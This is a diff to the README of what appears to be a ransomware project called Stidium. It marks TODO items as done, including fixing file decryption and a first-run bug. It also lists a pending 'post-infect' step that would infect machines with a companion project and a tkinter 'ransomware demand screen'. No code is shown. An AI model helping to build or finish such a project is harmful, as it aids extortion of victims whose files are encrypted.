Not-Baguette/Stidium/README.md

 ## TODO
 - [ ] Test it on a VM
 - [ ] Finish up `post-infect` function that infects it with [Project Gideon](https://github.com/Not-Baguette/Project-Gideon/)
-- [ ] Temporarily fix it up so it doesnt quit before decrypting all files
+- [X] fix it so it doesnt quit before decrypting all files
-- [ ] Fix first run issue
+- [x] Fix first run issue

 ## Dependencies
 - tkinter (for the ransomware demand screen)